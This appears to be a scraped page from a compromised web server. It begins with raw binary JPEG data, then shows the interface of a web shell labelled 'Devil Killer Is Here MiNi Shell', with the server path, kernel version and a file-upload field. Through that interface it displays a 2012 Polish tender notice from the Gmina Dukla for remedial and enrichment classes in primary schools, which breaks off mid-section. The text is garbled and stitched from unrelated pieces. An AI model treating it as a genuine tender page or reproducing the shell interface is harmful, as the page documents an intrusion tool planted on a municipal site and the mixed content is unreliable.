JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/202013-N-2012.html

<p class="kh_header"><b>Dukla: Usługi  edukacyjne  obejmujące  przeprowadzenie  zajęć  w  ramach  projektu indywidualizacji  procesu  nauczania  i wychowania  uczniów  klas  I-III  szkół  podstawowych  pt.: Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej,  w  roku  szkolnym  2012/2013 ,  w  szkołach  dla  których  organem prowadzącym jest Gmina Dukla</b><br>
<b>Numer ogłoszenia: 202013 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dukla , ul. Trakt Węgierski 11, 38-450 Dukla, woj. podkarpackie, tel. 013 4329135, faks 013 4331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dukla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi  edukacyjne  obejmujące  przeprowadzenie  zajęć  w  ramach  projektu indywidualizacji  procesu  nauczania  i wychowania  uczniów  klas  I-III  szkół  podstawowych  pt.: Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej,  w  roku  szkolnym  2012/2013 ,  w  szkołach  dla  których  organem prowadzącym jest Gmina Dukla.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej

Prowadzenie zajęć dla uczestników projektu  Indywidualizacja = edukacja Rozwój wykształcenia i kompetencji w regionach
9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakość usług edukacyjnych świadczonych w systemie oświaty
9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych
Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w roku szkolnym 2012-2013 w szkołach podstawowych, dla których organem prowadzącym jest Gmina Dukla


PRZEDMIOT ZAMÓWIENIA
Celem głównym jest indywidualizacja nauczania dzieci z klas I-III
OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA
Prowadzenie zajęć dla uczestników projektu Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w roku szkolnym 2012-2013 w szkołach, dla których organem prowadzącym jest Gmina Dukla
Rodzaj zamówienia: usługi 
Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
 1 Przedmiotem zamówienia jest usługa polegająca na prowadzeniu zajęć pozalekcyjnych (dydaktyczno-wyrównawczych) w ośmiu szkołach podstawowych dla których organem prowadzącym jest Gmina Dukla dla klas I - III dla uczestników programu: Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 
Celem głównym jest indywidualizacja nauczania dzieci z klas I-III służąca wyrównywaniu szans edukacyjnych oraz rozwijaniu talentów dzieci uzdolnionych z terenu Gminy Dukla w roku szkolnym 2012/2013. W procesie wyrównywania szans edukacyjnych uczniów i uczennic istotne jest przekazywanie im niestereotypowej wiedzy i szerokiego, niezależnego od płci spektrum możliwych wyborów życiowych, a także szacunku do odmienności i różnic. Wczesna edukacja tym zakresie   pozwoli na wyeliminowanie w przyszłości stereotypowego myślenia w podejściu do wyboru drogi zawodowej, zmniejszenie dysproporcji w osiągnięciach edukacyjnych co spowoduje wzrost umiejętności praktycznych uczniów, pokonanie trudności w nauce, wzrost u uczniów pewności siebie,  prawidłowe funkcjonowanie w środowisku rówieśniczym, umiejętne korzystanie z gier i programów komputerowych. 
Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów, działania dostosowywane będą do potrzeb uczniów w ramach zajęć wyrównawczych. 
Zadanie obejmuje: prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji, z trudnościami w zdobywaniu umiejętności matematycznych a także zajęć rozwijających zainteresowania uczniów uzdolnionych z uwzględnieniem zajęć z przedmiotów matematyczno-przyrodniczych, języki obce, zajęcia artystyczne, i gimnastyka korekcyjna. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy

Do obowiązków prowadzącego będzie należeć: 
a) prowadzenie zajęć pozalekcyjnych (zajęcia po obowiązkowych lekcjach w godzinach dostosowanych do wymogów uczestników i warunków szkoły), w terminie maksymalnym do 28 czerwca 2013 r. 
b) sporządzanie sprawozdań miesięcznych z realizacji zajęć, współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia, 
c) szczegółowe obowiązki ujęte zostały w zakresie obowiązków, stanowiącym załącznik nr1 do SIWZ, który będzie stanowić załącznik do umowy. 
Beneficjentem projektu jest - Gmina Dukla
Jednostką koordynującą projekt jest - Zespół Obsługi Placówek Oświatowych w Dukli ul.            Kościuszki  4
Numer i nazwa Priorytetu:                 IX - Rozwój wykształcenia i kompetencji w regionach. 
Numer i nazwa Poddziałania:          9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
Instytucja Pośrednicząca:                 Wojewódzki Urząd Pracy w Rzeszowie. 

Poniżej przedstawiono podział postępowania na części w zależności od miejsca wykonywania usługi (określona szkoła podstawowa) oraz rodzaju zajęć pozalekcyjnych: 



Szkoła Podstawowa w Zespole Szkół Nr 1 w Dukli
1)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część I NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie -  90 h
2012 rok 30 h
2013 rok 60 h 
Część II NAZWA: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych  Łącznie - 60h
2012 rok 20 h
2013 rok 40 h 
Część III NAZWA: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy Łącznie- 120 h
2012 rok 40 h
2013 rok 80 h 
Część IV NAZWA: Gimnastyka korekcyjna dla dzieci z wadami postawy Łącznie -60 h
2012 rok 20 h
2013 rok 40 h 
Część V NAZWA: Zajęcia rozwijające zainteresowania uczniów wybitnie, szczególnie uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno przyrodniczych Łącznie -60 h
2012 rok 20 h
2013 rok 40 h 
Część VI NAZWA: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych Języki obce dla dzieci Łącznie -150 h
2012 rok 50 h
2013 rok 100 h 
Część VII NAZWA: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystyczne Łącznie -180 h
2012 rok 60 h
2013 rok 120 h 

Szkoła Podstawowa w Głojscach. 
2)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część VIII NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie - 60 h
2012 rok 20 h
2013 rok 40 h 
Część IX NAZWA: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych Łącznie - 30h
2012 rok 10 h
2013 rok 20 h 
Część X NAZWA: Gimnastyka korekcyjna dla dzieci z wadami postawy Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 
Część XI NAZWA: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystyczne Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 



Szkoła Podstawowa w Iwli. 
3)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część XII NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie - 60 h
2012 rok 20 h
2013 rok 40 h 
Część XIII NAZWA: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy Łącznie- 60 h
2012 rok 20 h
2013 rok 40 h 

Szkoła Podstawowa w Wietrznie. 
4)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część XIV NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie - 30 h
2012 rok 10 h
2013 rok 20 h 
Część XV NAZWA: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystyczne Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 


 Szkoła Podstawowa  w Zespole Szkół Publicznych w Jasionce. 
5)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część XVI NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie - 30 h
2012 rok 10 h
2013 rok 20 h 
Część XVII NAZWA: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych Łącznie - 30h
2012 rok 10 h
2013 rok 20 h 
Część XVIII NAZWA: Zajęcia rozwijające zainteresowania uczniów wybitnie, szczególnie uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno przyrodniczych Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 

Szkoła Podstawowa  w Zespole Szkół Publicznych w Łękach Dukielskich
6)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część XIX NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie - 30 h
2012 rok 10 h
2013 rok 20 h 
Część XX NAZWA: Zajęcia rozwijające zainteresowania uczniów wybitnie, szczególnie uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno przyrodniczych Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 
Część XXI NAZWA: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystyczne Łącznie -60 h
2012 rok 20 h
2013 rok 40 h 
Szkoła Podstawowa  w Zespole Szkół Publicznych w Równem
7)Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część XXII NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie - 30 h
2012 rok 10 h
2013 rok 20 h 
Część XXIII NAZWA: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych Łącznie - 30h
2012 rok 10 h
2013 rok 20 h 
Część XXIV NAZWA: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy Łącznie- 30 h
2012 rok 10 h
2013 rok 20 h 
Część XXV NAZWA: Zajęcia rozwijające zainteresowania uczniów wybitnie, szczególnie uzdolnionych - ze szczególnym uwzględnieniem nauk matematyczno przyrodniczych Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 
Część XXVI NAZWA: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - artystyczne Łącznie -30 h
2012 rok 10 h
2013 rok 20 h 
Szkoła Podstawowa  w Zespole Szkół Publicznych w Tylawie
8)	Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 
Część XXVII NAZWA: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji Łącznie je - 30 h
2012 rok 10 h
2013 rok 20 h 
Część XXVIII NAZWA: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy Łącznie- 30 h
2012 rok 10 h
2013 rok 20 h 

Warunki:
1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1.1. Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga uprawnień określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009r. Nr 50, poz. 400).


1.2. Posiadania wiedzy i doświadczenia
Osoby, które będą uczestniczyć w wykonaniu zamówienia, tj. prowadzić zajęcia, muszą posiadać kwalifikacje do nauczania w szkole podstawowej zgodne z ww. rozporządzeniem oraz minimum pół roku doświadczenia w nauczaniu dzieci szkół podstawowych.
Do obowiązków prowadzącego będzie należało: 
-uzyskanie zgody rodziców na uczestnictwo dziecka w zajęciach; 
-sporządzenie diagnozy indywidualnej dziecka; 
-dostosowanie zajęć pozalekcyjnych do ustalonego przez dyrektora szkoły planu zajęć; 
-opracowanie w terminie 7 dni od daty zawarcia umowy programu i planu pracy zajęć pozalekcyjnych obejmującego harmonogram oraz zakres zadania dla uczestników projektu   Indywidualizacja =edukacja UDA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej  i przedstawienie do akceptacji dyrektorowi szkoły; 
-prowadzenie zajęć pozalekcyjnych (...godz. lekcyjnych zgodnie z projektem i harmonogramem Projektu Indywidualizacja =edukacja UDA-POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w wybranej przez siebie części Projektu w terminie maksymalnym do 28 czerwca 2013r. wg zaakceptowanego planu pracy; 
-dokumentowanie zajęć pozalekcyjnych w dzienniku zajęć, listach obecności, kartach ewaluacji; 
-informowanie wychowawcy, dyrektora o wynikach i o osiągnięciach uczniów, 
-przeprowadzenie ewaluacji zajęć 
- dwa razy w trakcie trwania projektu oraz przekazanie wniosków dyrektorowi  szkoły a dyrektor koordynatorowi; 
-prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz comiesięczne przekazywanie w formie elektronicznej i papierowej informacji koordynatorowi, w której realizowany jest projekt o stanie realizacji planu zajęć, w tym ilości zrealizowanych godzin. 
-wspomaganie promocji i ewaluacji projektu 
- informowanie o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpraca z dyrektorem szkoły w mierzeniu postępów uczniów w zakresie rezultatów projektu; 
-ponoszenie odpowiedzialności materialnej za mienie; 
-zobowiązanie do przestrzegania regulaminu sali, w której prowadzi zajęcia; 
-decydowanie o doborze metod i środków dydaktycznych w prowadzeniu zajęć ze szczególnym stosowaniem aktywizujących metod nauczania z naciskiem na umiejętność wykorzystania wiedzy w praktyce; 
-bieżące informowanie koordynatora i dyrektora szkoły o problemach mogących mieć wpływ na terminową lub prawidłową realizację przedmiotu umowy; 
-oznaczenie każdego dokumentu logotypem Unii Europejskiej i Programu Operacyjnego Kapitał Ludzki; Szczegółowy zakres obowiązków został ujęty w projekcie umowy, stanowiącej załącznik nr 5 do SIWZ. Zmiana godzin (nie dotycząca ilości) nie stanowi zmiany przedmiotu zamówienia i nie wymaga zmiany zawartej umowy. Jednostka 1h w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut. Termin wykonania poszczególnych usług będzie ustalany indywidualnie z dyrektorami szkół. Zamówienie obejmuje prowadzenie zajęć wg niżej wymienionych rodzajów przez wykonawcę zamówienia i składa się z 26 części. Dokładne godziny wykonywania zajęć zostaną ustalone z dyrektorem szkoły.. Ze względu na specyfikę przedmiotu zamówienia konieczne jest prowadzenie zajęć z dziećmi z danej szkoły i na terenie danej placówki po zakończeniu obowiązkowych zajęć wg harmonogramu opracowanego i uzgodnionego z dyrektorem szkoły. 
Ponadto zajęcia muszą być prowadzone w oparciu o autorskie programy uwzględniające przeprowadzoną diagnozę potrzeb uczestników projektu - oznacza to, że wykonawca musi prowadzić zajęcia samodzielnie. 
Celem głównym (ogólnym) projektu jest wyrównanie szans edukacyjnych poprzez indywidualizację procesu kształcenia dzieci klas I-III we wszystkich szkołach podstawowych funkcjonujących w gminie Dukla. Do celów szczegółowych projektu należą: 
a) zapewnienie dzieciom klas I-III szkół podstawowych gminy Dukla. oferty edukacyjno -wychowawczo - profilaktycznej, zgodnej z ich indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, 
b) zwiększenie stopnia i zakresu wykorzystania w w/w szkołach aktywizujących metod nauczania, 
c) zwiększenie dostępności i podniesienie jakości wsparcia i pomocy pedagogiczno-psychologicznej udzielanej dzieciom, w szczególności dzieciom o specjalnych potrzebach edukacyjnych, realizowanej na zajęciach terapeutycznych (terapii psychologicznej), 
d) wyszczególnienie i opis metod realizacji programu ze szczególnym uwzględnieniem metod aktywizujących pracę ucznia i jego zaangażowanie w zajęcia, e) wyszczególnienie i opis form realizacji programu ze szczególnym uwzględnieniem form aktywizujących pracę ucznia i jego zaangażowanie w zajęcia, 
f) zadania, 
g) treści i struktura programu zajęć, 
h) procedury/ metody osiągania celów, 
i) spodziewane efekty/rezultaty (ze szczególnym uwzględnieniem rezultatów zawartych w projekcie), 
j) ewaluacja programu ( ocena przydatności i skuteczności przeprowadzonych zajęć w odniesieniu do założonych celów), 
k) ewentualne załączniki (np. zdjęcia, rysunki)... 
Wiedza i doświadczenie 
Opis sposobu dokonywania oceny spełniania tego warunku 
a) stopień awansu zawodowego co najmniej nauczyciela kontraktowego, 
b) wykonawcy poszczególnych zadań muszą spełniać następujące wymogi dotyczące wykształcenia: 
- wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach 1 - 3 szkoły podstawowej lub do realizacji zajęć dla dzieci z trudnościami w czytaniu i pisaniu, 
- wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach 1 - 3 szkoły podstawowej lub do realizacji zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych 
- wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach 1 - 3 szkoły podstawowej lub do realizacji zajęć dla dzieci z trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją, 
jest niezaangażowany w realizację innych projektów finansowanych w ramach PO KL 2007-2013, nie jest pracownikiem instytucji uczestniczących w realizacji PO KL 2007-2013, nie podlega wykluczeniu z postępowania o udzielenie zamówienia oraz legitymuje się dokumentem potwierdzającym posiadanie przygotowania pedagogicznego oraz aktem nadania stopnia awansu zawodowego co najmniej nauczyciela kontraktowego. 
 
Zamawiający wymaga, aby wybrany wykonawca zawarł z nim umowę na warunkach określonych we wzorze umowy stanowiącym załącznik. 


Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej: Projekt systemowy: Indywidualizacja =edukacja DA - POKL.09.01.02-18-004/12-00 Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej gminie Dukla wniosek  złożony i wyłoniony w otwartym konkursie ogłoszonym przez Wojewódzki Urząd Pracy w Rzeszowie  w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych współfinansowanego z Europejskiego Funduszu Społecznego...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 28.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złoęznie oświadczenia wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złoęznie oświadczenia wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złoęznie oświadczenia wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złoęznie oświadczenia wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie tego warunku Zamawiający uzna złoęznie oświadczenia wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
